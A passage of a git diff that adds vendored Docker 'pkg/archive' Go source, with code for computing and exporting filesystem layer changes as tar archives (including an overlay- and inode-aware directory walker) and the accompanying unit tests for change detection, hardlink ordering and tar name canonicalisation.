+ t.Skip("Currently fails") + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := "c:dest" + srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, "src", "src") + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err == nil { + t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.") + } +} + +func TestCanonicalTarNameForPath(t *testing.T) { + cases := []struct { + in, expected string + shouldFail bool + }{ + {"foo", "foo", false}, + {"foo/bar", "___", true}, // unix-styled windows path must fail + {`foo\bar`, "foo/bar", false}, + } + for _, v := range cases { + if out, err := CanonicalTarNameForPath(v.in); err != nil && !v.shouldFail { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if v.shouldFail && err == nil { + t.Fatalf("canonical path call should have failed with error. in=%s out=%s", v.in, out) + } else if !v.shouldFail && out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestCanonicalTarName(t *testing.T) { + cases := []struct { + in string + isDir bool + expected string + }{ + {"foo", false, "foo"}, + {"foo", true, "foo/"}, + {`foo\bar`, false, "foo/bar"}, + {`foo\bar`, true, "foo/bar/"}, + } + for _, v := range cases { + if out, err := canonicalTarName(v.in, v.isDir); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestChmodTarEntry(t *testing.T) { + cases := []struct { + in, expected os.FileMode + }{ + {0000, 0111}, + {0777, 0755}, + {0644, 0755}, + {0755, 0755}, + {0444, 0555}, + } + for _, v := range cases { + if out := chmodTarEntry(v.in); out != v.expected { + t.Fatalf("wrong chmod. 
expected:%v got:%v", v.expected, out) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go new file mode 100644 index 0000000000..c07d55cbd9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes.go @@ -0,0 +1,446 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "sort" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" +) + +// ChangeType represents the change type. +type ChangeType int + +const ( + // ChangeModify represents the modify operation. + ChangeModify = iota + // ChangeAdd represents the add operation. + ChangeAdd + // ChangeDelete represents the delete operation. + ChangeDelete +) + +func (c ChangeType) String() string { + switch c { + case ChangeModify: + return "C" + case ChangeAdd: + return "A" + case ChangeDelete: + return "D" + } + return "" +} + +// Change represents a change, it wraps the change type and path. +// It describes changes of the files in the path respect to the +// parent layers. The change could be modify, add, delete. +// This is used for layer diff. 
+type Change struct { + Path string + Kind ChangeType +} + +func (change *Change) String() string { + return fmt.Sprintf("%s %s", change.Kind, change.Path) +} + +// for sort.Sort +type changesByPath []Change + +func (c changesByPath) Less(i, j int) bool { return c[i].Path < c[j].Path } +func (c changesByPath) Len() int { return len(c) } +func (c changesByPath) Swap(i, j int) { c[j], c[i] = c[i], c[j] } + +// Gnu tar and the go tar writer don't have sub-second mtime +// precision, which is problematic when we apply changes via tar +// files, we handle this by comparing for exact times, *or* same +// second count and either a or b having exactly 0 nanoseconds +func sameFsTime(a, b time.Time) bool { + return a == b || + (a.Unix() == b.Unix() && + (a.Nanosecond() == 0 || b.Nanosecond() == 0)) +} + +func sameFsTimeSpec(a, b syscall.Timespec) bool { + return a.Sec == b.Sec && + (a.Nsec == b.Nsec || a.Nsec == 0 || b.Nsec == 0) +} + +// Changes walks the path rw and determines changes for the files in the path, +// with respect to the parent layers +func Changes(layers []string, rw string) ([]Change, error) { + return changes(layers, rw, aufsDeletedFile, aufsMetadataSkip) +} + +func aufsMetadataSkip(path string) (skip bool, err error) { + skip, err = filepath.Match(string(os.PathSeparator)+WhiteoutMetaPrefix+"*", path) + if err != nil { + skip = true + } + return +} + +func aufsDeletedFile(root, path string, fi os.FileInfo) (string, error) { + f := filepath.Base(path) + + // If there is a whiteout, then the file was removed + if strings.HasPrefix(f, WhiteoutPrefix) { + originalFile := f[len(WhiteoutPrefix):] + return filepath.Join(filepath.Dir(path), originalFile), nil + } + + return "", nil +} + +type skipChange func(string) (bool, error) +type deleteChange func(string, string, os.FileInfo) (string, error) + +func changes(layers []string, rw string, dc deleteChange, sc skipChange) ([]Change, error) { + var ( + changes []Change + changedDirs = make(map[string]struct{}) + ) 
+ + err := filepath.Walk(rw, func(path string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + path, err = filepath.Rel(rw, path) + if err != nil { + return err + } + + // As this runs on the daemon side, file paths are OS specific. + path = filepath.Join(string(os.PathSeparator), path) + + // Skip root + if path == string(os.PathSeparator) { + return nil + } + + if sc != nil { + if skip, err := sc(path); skip { + return err + } + } + + change := Change{ + Path: path, + } + + deletedFile, err := dc(rw, path, f) + if err != nil { + return err + } + + // Find out what kind of modification happened + if deletedFile != "" { + change.Path = deletedFile + change.Kind = ChangeDelete + } else { + // Otherwise, the file was added + change.Kind = ChangeAdd + + // ...Unless it already existed in a top layer, in which case, it's a modification + for _, layer := range layers { + stat, err := os.Stat(filepath.Join(layer, path)) + if err != nil && !os.IsNotExist(err) { + return err + } + if err == nil { + // The file existed in the top layer, so that's a modification + + // However, if it's a directory, maybe it wasn't actually modified. + // If you modify /foo/bar/baz, then /foo will be part of the changed files only because it's the parent of bar + if stat.IsDir() && f.IsDir() { + if f.Size() == stat.Size() && f.Mode() == stat.Mode() && sameFsTime(f.ModTime(), stat.ModTime()) { + // Both directories are the same, don't record the change + return nil + } + } + change.Kind = ChangeModify + break + } + } + } + + // If /foo/bar/file.txt is modified, then /foo/bar must be part of the changed files. + // This block is here to ensure the change is recorded even if the + // modify time, mode and size of the parent directory in the rw and ro layers are all equal. + // Check https://github.com/docker/docker/pull/13590 for details. 
+ if f.IsDir() { + changedDirs[path] = struct{}{} + } + if change.Kind == ChangeAdd || change.Kind == ChangeDelete { + parent := filepath.Dir(path) + if _, ok := changedDirs[parent]; !ok && parent != "/" { + changes = append(changes, Change{Path: parent, Kind: ChangeModify}) + changedDirs[parent] = struct{}{} + } + } + + // Record change + changes = append(changes, change) + return nil + }) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + return changes, nil +} + +// FileInfo describes the information of a file. +type FileInfo struct { + parent *FileInfo + name string + stat *system.StatT + children map[string]*FileInfo + capability []byte + added bool +} + +// LookUp looks up the file information of a file. +func (info *FileInfo) LookUp(path string) *FileInfo { + // As this runs on the daemon side, file paths are OS specific. + parent := info + if path == string(os.PathSeparator) { + return info + } + + pathElements := strings.Split(path, string(os.PathSeparator)) + for _, elem := range pathElements { + if elem != "" { + child := parent.children[elem] + if child == nil { + return nil + } + parent = child + } + } + return parent +} + +func (info *FileInfo) path() string { + if info.parent == nil { + // As this runs on the daemon side, file paths are OS specific. 
+ return string(os.PathSeparator) + } + return filepath.Join(info.parent.path(), info.name) +} + +func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { + + sizeAtEntry := len(*changes) + + if oldInfo == nil { + // add + change := Change{ + Path: info.path(), + Kind: ChangeAdd, + } + *changes = append(*changes, change) + info.added = true + } + + // We make a copy so we can modify it to detect additions + // also, we only recurse on the old dir if the new info is a directory + // otherwise any previous delete/change is considered recursive + oldChildren := make(map[string]*FileInfo) + if oldInfo != nil && info.isDir() { + for k, v := range oldInfo.children { + oldChildren[k] = v + } + } + + for name, newChild := range info.children { + oldChild, _ := oldChildren[name] + if oldChild != nil { + // change? + oldStat := oldChild.stat + newStat := newChild.stat + // Note: We can't compare inode or ctime or blocksize here, because these change + // when copying a file into a container. However, that is not generally a problem + // because any content change will change mtime, and any status change should + // be visible when actually comparing the stat fields. The only time this + // breaks down is if some code intentionally hides a change by setting + // back mtime + if statDifferent(oldStat, newStat) || + bytes.Compare(oldChild.capability, newChild.capability) != 0 { + change := Change{ + Path: newChild.path(), + Kind: ChangeModify, + } + *changes = append(*changes, change) + newChild.added = true + } + + // Remove from copy so we can detect deletions + delete(oldChildren, name) + } + + newChild.addChanges(oldChild, changes) + } + for _, oldChild := range oldChildren { + // delete + change := Change{ + Path: oldChild.path(), + Kind: ChangeDelete, + } + *changes = append(*changes, change) + } + + // If there were changes inside this directory, we need to add it, even if the directory + // itself wasn't changed. 
This is needed to properly save and restore filesystem permissions. + // As this runs on the daemon side, file paths are OS specific. + if len(*changes) > sizeAtEntry && info.isDir() && !info.added && info.path() != string(os.PathSeparator) { + change := Change{ + Path: info.path(), + Kind: ChangeModify, + } + // Let's insert the directory entry before the recently added entries located inside this dir + *changes = append(*changes, change) // just to resize the slice, will be overwritten + copy((*changes)[sizeAtEntry+1:], (*changes)[sizeAtEntry:]) + (*changes)[sizeAtEntry] = change + } + +} + +// Changes add changes to file information. +func (info *FileInfo) Changes(oldInfo *FileInfo) []Change { + var changes []Change + + info.addChanges(oldInfo, &changes) + + return changes +} + +func newRootFileInfo() *FileInfo { + // As this runs on the daemon side, file paths are OS specific. + root := &FileInfo{ + name: string(os.PathSeparator), + children: make(map[string]*FileInfo), + } + return root +} + +// ChangesDirs compares two directories and generates an array of Change objects describing the changes. +// If oldDir is "", then all files in newDir will be Add-Changes. +func ChangesDirs(newDir, oldDir string) ([]Change, error) { + var ( + oldRoot, newRoot *FileInfo + ) + if oldDir == "" { + emptyDir, err := ioutil.TempDir("", "empty") + if err != nil { + return nil, err + } + defer os.Remove(emptyDir) + oldDir = emptyDir + } + oldRoot, newRoot, err := collectFileInfoForChanges(oldDir, newDir) + if err != nil { + return nil, err + } + + return newRoot.Changes(oldRoot), nil +} + +// ChangesSize calculates the size in bytes of the provided changes, based on newDir. 
+func ChangesSize(newDir string, changes []Change) int64 { + var ( + size int64 + sf = make(map[uint64]struct{}) + ) + for _, change := range changes { + if change.Kind == ChangeModify || change.Kind == ChangeAdd { + file := filepath.Join(newDir, change.Path) + fileInfo, err := os.Lstat(file) + if err != nil { + logrus.Errorf("Can not stat %q: %s", file, err) + continue + } + + if fileInfo != nil && !fileInfo.IsDir() { + if hasHardlinks(fileInfo) { + inode := getIno(fileInfo) + if _, ok := sf[inode]; !ok { + size += fileInfo.Size() + sf[inode] = struct{}{} + } + } else { + size += fileInfo.Size() + } + } + } + } + return size +} + +// ExportChanges produces an Archive from the provided changes, relative to dir. +func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) { + reader, writer := io.Pipe() + go func() { + ta := &tarAppender{ + TarWriter: tar.NewWriter(writer), + Buffer: pools.BufioWriter32KPool.Get(nil), + SeenFiles: make(map[uint64]string), + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + // this buffer is needed for the duration of this piped stream + defer pools.BufioWriter32KPool.Put(ta.Buffer) + + sort.Sort(changesByPath(changes)) + + // In general we log errors here but ignore them because + // during e.g. 
a diff operation the container can continue + // mutating the filesystem and we can see transient errors + // from this + for _, change := range changes { + if change.Kind == ChangeDelete { + whiteOutDir := filepath.Dir(change.Path) + whiteOutBase := filepath.Base(change.Path) + whiteOut := filepath.Join(whiteOutDir, WhiteoutPrefix+whiteOutBase) + timestamp := time.Now() + hdr := &tar.Header{ + Name: whiteOut[1:], + Size: 0, + ModTime: timestamp, + AccessTime: timestamp, + ChangeTime: timestamp, + } + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + logrus.Debugf("Can't write whiteout header: %s", err) + } + } else { + path := filepath.Join(dir, change.Path) + if err := ta.addTarFile(path, change.Path[1:]); err != nil { + logrus.Debugf("Can't add file %s to tar: %s", path, err) + } + } + } + + // Make sure to check the error on Close. + if err := ta.TarWriter.Close(); err != nil { + logrus.Debugf("Can't close layer: %s", err) + } + if err := writer.Close(); err != nil { + logrus.Debugf("failed close Changes writer: %s", err) + } + }() + return reader, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go new file mode 100644 index 0000000000..fc5a9dfdb9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go @@ -0,0 +1,312 @@ +package archive + +import ( + "bytes" + "fmt" + "os" + "path/filepath" + "sort" + "syscall" + "unsafe" + + "github.com/docker/docker/pkg/system" +) + +// walker is used to implement collectFileInfoForChanges on linux. Where this +// method in general returns the entire contents of two directory trees, we +// optimize some FS calls out on linux. 
In particular, we take advantage of the +// fact that getdents(2) returns the inode of each file in the directory being +// walked, which, when walking two trees in parallel to generate a list of +// changes, can be used to prune subtrees without ever having to lstat(2) them +// directly. Eliminating stat calls in this way can save up to seconds on large +// images. +type walker struct { + dir1 string + dir2 string + root1 *FileInfo + root2 *FileInfo +} + +// collectFileInfoForChanges returns a complete representation of the trees +// rooted at dir1 and dir2, with one important exception: any subtree or +// leaf where the inode and device numbers are an exact match between dir1 +// and dir2 will be pruned from the results. This method is *only* to be used +// to generating a list of changes between the two directories, as it does not +// reflect the full contents. +func collectFileInfoForChanges(dir1, dir2 string) (*FileInfo, *FileInfo, error) { + w := &walker{ + dir1: dir1, + dir2: dir2, + root1: newRootFileInfo(), + root2: newRootFileInfo(), + } + + i1, err := os.Lstat(w.dir1) + if err != nil { + return nil, nil, err + } + i2, err := os.Lstat(w.dir2) + if err != nil { + return nil, nil, err + } + + if err := w.walk("/", i1, i2); err != nil { + return nil, nil, err + } + + return w.root1, w.root2, nil +} + +// Given a FileInfo, its path info, and a reference to the root of the tree +// being constructed, register this file with the tree. 
+func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error { + if fi == nil { + return nil + } + parent := root.LookUp(filepath.Dir(path)) + if parent == nil { + return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path) + } + info := &FileInfo{ + name: filepath.Base(path), + children: make(map[string]*FileInfo), + parent: parent, + } + cpath := filepath.Join(dir, path) + stat, err := system.FromStatT(fi.Sys().(*syscall.Stat_t)) + if err != nil { + return err + } + info.stat = stat + info.capability, _ = system.Lgetxattr(cpath, "security.capability") // lgetxattr(2): fs access + parent.children[info.name] = info + return nil +} + +// Walk a subtree rooted at the same path in both trees being iterated. For +// example, /docker/overlay/1234/a/b/c/d and /docker/overlay/8888/a/b/c/d +func (w *walker) walk(path string, i1, i2 os.FileInfo) (err error) { + // Register these nodes with the return trees, unless we're still at the + // (already-created) roots: + if path != "/" { + if err := walkchunk(path, i1, w.dir1, w.root1); err != nil { + return err + } + if err := walkchunk(path, i2, w.dir2, w.root2); err != nil { + return err + } + } + + is1Dir := i1 != nil && i1.IsDir() + is2Dir := i2 != nil && i2.IsDir() + + sameDevice := false + if i1 != nil && i2 != nil { + si1 := i1.Sys().(*syscall.Stat_t) + si2 := i2.Sys().(*syscall.Stat_t) + if si1.Dev == si2.Dev { + sameDevice = true + } + } + + // If these files are both non-existent, or leaves (non-dirs), we are done. 
+ if !is1Dir && !is2Dir { + return nil + } + + // Fetch the names of all the files contained in both directories being walked: + var names1, names2 []nameIno + if is1Dir { + names1, err = readdirnames(filepath.Join(w.dir1, path)) // getdents(2): fs access + if err != nil { + return err + } + } + if is2Dir { + names2, err = readdirnames(filepath.Join(w.dir2, path)) // getdents(2): fs access + if err != nil { + return err + } + } + + // We have lists of the files contained in both parallel directories, sorted + // in the same order. Walk them in parallel, generating a unique merged list + // of all items present in either or both directories. + var names []string + ix1 := 0 + ix2 := 0 + + for { + if ix1 >= len(names1) { + break + } + if ix2 >= len(names2) { + break + } + + ni1 := names1[ix1] + ni2 := names2[ix2] + + switch bytes.Compare([]byte(ni1.name), []byte(ni2.name)) { + case -1: // ni1 < ni2 -- advance ni1 + // we will not encounter ni1 in names2 + names = append(names, ni1.name) + ix1++ + case 0: // ni1 == ni2 + if ni1.ino != ni2.ino || !sameDevice { + names = append(names, ni1.name) + } + ix1++ + ix2++ + case 1: // ni1 > ni2 -- advance ni2 + // we will not encounter ni2 in names1 + names = append(names, ni2.name) + ix2++ + } + } + for ix1 < len(names1) { + names = append(names, names1[ix1].name) + ix1++ + } + for ix2 < len(names2) { + names = append(names, names2[ix2].name) + ix2++ + } + + // For each of the names present in either or both of the directories being + // iterated, stat the name under each root, and recurse the pair of them: + for _, name := range names { + fname := filepath.Join(path, name) + var cInfo1, cInfo2 os.FileInfo + if is1Dir { + cInfo1, err = os.Lstat(filepath.Join(w.dir1, fname)) // lstat(2): fs access + if err != nil && !os.IsNotExist(err) { + return err + } + } + if is2Dir { + cInfo2, err = os.Lstat(filepath.Join(w.dir2, fname)) // lstat(2): fs access + if err != nil && !os.IsNotExist(err) { + return err + } + } + if err = 
w.walk(fname, cInfo1, cInfo2); err != nil { + return err + } + } + return nil +} + +// {name,inode} pairs used to support the early-pruning logic of the walker type +type nameIno struct { + name string + ino uint64 +} + +type nameInoSlice []nameIno + +func (s nameInoSlice) Len() int { return len(s) } +func (s nameInoSlice) Swap(i, j int) { s[i], s[j] = s[j], s[i] } +func (s nameInoSlice) Less(i, j int) bool { return s[i].name < s[j].name } + +// readdirnames is a hacked-apart version of the Go stdlib code, exposing inode +// numbers further up the stack when reading directory contents. Unlike +// os.Readdirnames, which returns a list of filenames, this function returns a +// list of {filename,inode} pairs. +func readdirnames(dirname string) (names []nameIno, err error) { + var ( + size = 100 + buf = make([]byte, 4096) + nbuf int + bufp int + nb int + ) + + f, err := os.Open(dirname) + if err != nil { + return nil, err + } + defer f.Close() + + names = make([]nameIno, 0, size) // Empty with room to grow. + for { + // Refill the buffer if necessary + if bufp >= nbuf { + bufp = 0 + nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux + if nbuf < 0 { + nbuf = 0 + } + if err != nil { + return nil, os.NewSyscallError("readdirent", err) + } + if nbuf <= 0 { + break // EOF + } + } + + // Drain the buffer + nb, names = parseDirent(buf[bufp:nbuf], names) + bufp += nb + } + + sl := nameInoSlice(names) + sort.Sort(sl) + return sl, nil +} + +// parseDirent is a minor modification of syscall.ParseDirent (linux version) +// which returns {name,inode} pairs instead of just names. +func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) { + origlen := len(buf) + for len(buf) > 0 { + dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0])) + buf = buf[dirent.Reclen:] + if dirent.Ino == 0 { // File absent in directory. 
+ continue + } + bytes := (*[10000]byte)(unsafe.Pointer(&dirent.Name[0])) + var name = string(bytes[0:clen(bytes[:])]) + if name == "." || name == ".." { // Useless names + continue + } + names = append(names, nameIno{name, dirent.Ino}) + } + return origlen - len(buf), names +} + +func clen(n []byte) int { + for i := 0; i < len(n); i++ { + if n[i] == 0 { + return i + } + } + return len(n) +} + +// OverlayChanges walks the path rw and determines changes for the files in the path, +// with respect to the parent layers +func OverlayChanges(layers []string, rw string) ([]Change, error) { + return changes(layers, rw, overlayDeletedFile, nil) +} + +func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) { + if fi.Mode()&os.ModeCharDevice != 0 { + s := fi.Sys().(*syscall.Stat_t) + if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 { + return path, nil + } + } + if fi.Mode()&os.ModeDir != 0 { + opaque, err := system.Lgetxattr(filepath.Join(root, path), "trusted.overlay.opaque") + if err != nil { + return "", err + } + if len(opaque) == 1 && opaque[0] == 'y' { + return path, nil + } + } + + return "", nil + +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go new file mode 100644 index 0000000000..da70ed37c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go @@ -0,0 +1,97 @@ +// +build !linux + +package archive + +import ( + "fmt" + "os" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/docker/pkg/system" +) + +func collectFileInfoForChanges(oldDir, newDir string) (*FileInfo, *FileInfo, error) { + var ( + oldRoot, newRoot *FileInfo + err1, err2 error + errs = make(chan error, 2) + ) + go func() { + oldRoot, err1 = collectFileInfo(oldDir) + errs <- err1 + }() + go func() { + newRoot, err2 = collectFileInfo(newDir) + errs <- err2 + }() + + // block until both routines have returned + for i := 0; i < 2; i++ { + if err 
:= <-errs; err != nil { + return nil, nil, err + } + } + + return oldRoot, newRoot, nil +} + +func collectFileInfo(sourceDir string) (*FileInfo, error) { + root := newRootFileInfo() + + err := filepath.Walk(sourceDir, func(path string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(sourceDir, path) + if err != nil { + return err + } + + // As this runs on the daemon side, file paths are OS specific. + relPath = filepath.Join(string(os.PathSeparator), relPath) + + // See https://github.com/golang/go/issues/9168 - bug in filepath.Join. + // Temporary workaround. If the returned path starts with two backslashes, + // trim it down to a single backslash. Only relevant on Windows. + if runtime.GOOS == "windows" { + if strings.HasPrefix(relPath, `\\`) { + relPath = relPath[1:] + } + } + + if relPath == string(os.PathSeparator) { + return nil + } + + parent := root.LookUp(filepath.Dir(relPath)) + if parent == nil { + return fmt.Errorf("collectFileInfo: Unexpectedly no parent for %s", relPath) + } + + info := &FileInfo{ + name: filepath.Base(relPath), + children: make(map[string]*FileInfo), + parent: parent, + } + + s, err := system.Lstat(path) + if err != nil { + return err + } + info.stat = s + + info.capability, _ = system.Lgetxattr(path, "security.capability") + + parent.children[info.name] = info + + return nil + }) + if err != nil { + return nil, err + } + return root, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go new file mode 100644 index 0000000000..095102e578 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go @@ -0,0 +1,132 @@ +package archive + +import ( + "archive/tar" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "runtime" + "sort" + "testing" +) + +func TestHardLinkOrder(t *testing.T) { + //TODO Should run for Solaris + if runtime.GOOS == "solaris" 
{ + t.Skip("gcp failures on Solaris") + } + names := []string{"file1.txt", "file2.txt", "file3.txt"} + msg := []byte("Hey y'all") + + // Create dir + src, err := ioutil.TempDir("", "docker-hardlink-test-src-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + for _, name := range names { + func() { + fh, err := os.Create(path.Join(src, name)) + if err != nil { + t.Fatal(err) + } + defer fh.Close() + if _, err = fh.Write(msg); err != nil { + t.Fatal(err) + } + }() + } + // Create dest, with changes that includes hardlinks + dest, err := ioutil.TempDir("", "docker-hardlink-test-dest-") + if err != nil { + t.Fatal(err) + } + os.RemoveAll(dest) // we just want the name, at first + if err := copyDir(src, dest); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + for _, name := range names { + for i := 0; i < 5; i++ { + if err := os.Link(path.Join(dest, name), path.Join(dest, fmt.Sprintf("%s.link%d", name, i))); err != nil { + t.Fatal(err) + } + } + } + + // get changes + changes, err := ChangesDirs(dest, src) + if err != nil { + t.Fatal(err) + } + + // sort + sort.Sort(changesByPath(changes)) + + // ExportChanges + ar, err := ExportChanges(dest, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + hdrs, err := walkHeaders(ar) + if err != nil { + t.Fatal(err) + } + + // reverse sort + sort.Sort(sort.Reverse(changesByPath(changes))) + // ExportChanges + arRev, err := ExportChanges(dest, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + hdrsRev, err := walkHeaders(arRev) + if err != nil { + t.Fatal(err) + } + + // line up the two sets + sort.Sort(tarHeaders(hdrs)) + sort.Sort(tarHeaders(hdrsRev)) + + // compare Size and LinkName + for i := range hdrs { + if hdrs[i].Name != hdrsRev[i].Name { + t.Errorf("headers - expected name %q; but got %q", hdrs[i].Name, hdrsRev[i].Name) + } + if hdrs[i].Size != hdrsRev[i].Size { + t.Errorf("headers - %q expected size %d; but got %d", hdrs[i].Name, hdrs[i].Size, hdrsRev[i].Size) + } + if 
hdrs[i].Typeflag != hdrsRev[i].Typeflag { + t.Errorf("headers - %q expected type %d; but got %d", hdrs[i].Name, hdrs[i].Typeflag, hdrsRev[i].Typeflag) + } + if hdrs[i].Linkname != hdrsRev[i].Linkname { + t.Errorf("headers - %q expected linkname %q; but got %q", hdrs[i].Name, hdrs[i].Linkname, hdrsRev[i].Linkname) + } + } + +} + +type tarHeaders []tar.Header + +func (th tarHeaders) Len() int { return len(th) } +func (th tarHeaders) Swap(i, j int) { th[j], th[i] = th[i], th[j] } +func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name } + +func walkHeaders(r io.Reader) ([]tar.Header, error) { + t := tar.NewReader(r) + headers := []tar.Header{} + for { + hdr, err := t.Next() + if err != nil { + if err == io.EOF { + break + } + return headers, err + } + headers = append(headers, *hdr) + } + return headers, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_test.go new file mode 100644 index 0000000000..eae1d022c7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go @@ -0,0 +1,572 @@ +package archive + +import ( + "io/ioutil" + "os" + "os/exec" + "path" + "runtime" + "sort" + "testing" + "time" + + "github.com/docker/docker/pkg/system" +) + +func max(x, y int) int { + if x >= y { + return x + } + return y +} + +func copyDir(src, dst string) error { + cmd := exec.Command("cp", "-a", src, dst) + if runtime.GOOS == "solaris" { + cmd = exec.Command("gcp", "-a", src, dst) + } + + if err := cmd.Run(); err != nil { + return err + } + return nil +} + +type FileType uint32 + +const ( + Regular FileType = iota + Dir + Symlink +) + +type FileData struct { + filetype FileType + path string + contents string + permissions os.FileMode +} + +func createSampleDir(t *testing.T, root string) { + files := []FileData{ + {Regular, "file1", "file1\n", 0600}, + {Regular, "file2", "file2\n", 0666}, + {Regular, "file3", "file3\n", 0404}, + {Regular, "file4", "file4\n", 
0600}, + {Regular, "file5", "file5\n", 0600}, + {Regular, "file6", "file6\n", 0600}, + {Regular, "file7", "file7\n", 0600}, + {Dir, "dir1", "", 0740}, + {Regular, "dir1/file1-1", "file1-1\n", 01444}, + {Regular, "dir1/file1-2", "file1-2\n", 0666}, + {Dir, "dir2", "", 0700}, + {Regular, "dir2/file2-1", "file2-1\n", 0666}, + {Regular, "dir2/file2-2", "file2-2\n", 0666}, + {Dir, "dir3", "", 0700}, + {Regular, "dir3/file3-1", "file3-1\n", 0666}, + {Regular, "dir3/file3-2", "file3-2\n", 0666}, + {Dir, "dir4", "", 0700}, + {Regular, "dir4/file3-1", "file4-1\n", 0666}, + {Regular, "dir4/file3-2", "file4-2\n", 0666}, + {Symlink, "symlink1", "target1", 0666}, + {Symlink, "symlink2", "target2", 0666}, + {Symlink, "symlink3", root + "/file1", 0666}, + {Symlink, "symlink4", root + "/symlink3", 0666}, + {Symlink, "dirSymlink", root + "/dir1", 0740}, + } + + now := time.Now() + for _, info := range files { + p := path.Join(root, info.path) + if info.filetype == Dir { + if err := os.MkdirAll(p, info.permissions); err != nil { + t.Fatal(err) + } + } else if info.filetype == Regular { + if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil { + t.Fatal(err) + } + } else if info.filetype == Symlink { + if err := os.Symlink(info.contents, p); err != nil { + t.Fatal(err) + } + } + + if info.filetype != Symlink { + // Set a consistent ctime, atime for all files and dirs + if err := system.Chtimes(p, now, now); err != nil { + t.Fatal(err) + } + } + } +} + +func TestChangeString(t *testing.T) { + modifiyChange := Change{"change", ChangeModify} + toString := modifiyChange.String() + if toString != "C change" { + t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString) + } + addChange := Change{"change", ChangeAdd} + toString = addChange.String() + if toString != "A change" { + t.Fatalf("String() of a change with ChangeAdd Kind should have been %s but was %s", "A change", toString) + } + deleteChange := 
Change{"change", ChangeDelete} + toString = deleteChange.String() + if toString != "D change" { + t.Fatalf("String() of a change with ChangeDelete Kind should have been %s but was %s", "D change", toString) + } +} + +func TestChangesWithNoChanges(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + rwLayer, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rwLayer) + layer, err := ioutil.TempDir("", "docker-changes-test-layer") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(layer) + createSampleDir(t, layer) + changes, err := Changes([]string{layer}, rwLayer) + if err != nil { + t.Fatal(err) + } + if len(changes) != 0 { + t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes)) + } +} + +func TestChangesWithChanges(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. 
